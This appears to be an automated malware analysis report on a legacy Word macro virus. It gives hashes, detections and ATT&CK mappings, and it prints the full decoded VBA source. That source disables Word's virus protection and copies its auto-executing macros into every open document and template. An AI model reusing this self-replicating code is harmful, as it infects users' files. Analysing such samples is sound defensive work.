Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42a27cfab42eba57…

MALICIOUS

Office (OLE)

Size: 40.5 KB
Created: 1997-04-26 16:26:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 0332f84c18c99a040516d48740eef170
SHA-1: 56292dc1dabd23447c4defb51ee59dfa7783d928
SHA-256: 42a27cfab42eba578e074eb9c5cc696f251966821948a234d5ab975c9b0a07c1
Risk Score: 240

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample contains VBA macros, including AutoOpen and AutoClose, which are indicative of malicious intent. The script attempts to copy its macros to other open documents and templates, suggesting worm-like behavior to spread the infection. The ClamAV detections 'Doc.Trojan.CopyTest-1' and 'Win.Trojan.Alicia-3' further confirm its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.CopyTest-1 [critical] [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.CopyTest-1
  • VBA macros detected [medium] [OLE_VBA_MACROS] (2 related findings)
    Document contains VBA macro code
  • AutoOpen macro [high] [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Auto_Close macro [high] [OLE_VBA_AUTOCLOSE]
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker [medium] [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2393 bytes
SHA-256: 9911413c8dcfeea0939e9e396365238c1d88c373bf977cd036193f7d27aabf7c
Detection: ClamAV: Win.Trojan.Alicia-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Infect"
Sub MAIN()
    
    myname = ThisDocument.FullName
    Word.Options.VirusProtection = False
    
    For Each d In Word.Documents
        If (d.FullName <> myname) Then
            Debug.Print myname + " -> " + d.FullName
            Call CopyMacros(myname, d.FullName)
        End If
    Next d
    
    For Each t In Word.Templates
        If (t.FullName <> myname) Then
            Call CopyMacros(myname, t.FullName)
        End If
    Next t
    Rem Application.OrganizerCopy "d:\test2.doc", "d:\test1.doc", "Test", 3
End Sub

Sub CopyMacros(ByVal s As String, ByVal d As String)
    On Error GoTo AlreadyInfected

    Application.OrganizerCopy s, d, "Infect", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoClose", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoExec", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoOpen", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoExit", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileClose", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileSave", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileSaveAs", wdOrganizerObjectProjectItems

AlreadyInfected:
End Sub

Sub SaveDoc()
    If (Application.ActiveDocument.Saved = False) Then
        If (Application.ActiveDocument.Path <> "") Then
            Application.ActiveDocument.Save
        End If
    End If
End Sub

Attribute VB_Name = "AutoClose"
Sub MAIN()
    Infect.MAIN
    Infect.SaveDoc
End Sub


Attribute VB_Name = "AutoExec"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "AutoOpen"
Sub MAIN()
    Infect.MAIN
End Sub

Attribute VB_Name = "AutoExit"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "FileClose"
Sub MAIN()
    Infect.MAIN
    Infect.SaveDoc
End Sub


Attribute VB_Name = "FileSave"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "FileSaveAs"
Sub MAIN()
    Infect.MAIN
    Word.Dialogs(wdDialogFileSaveAs).Show
End Sub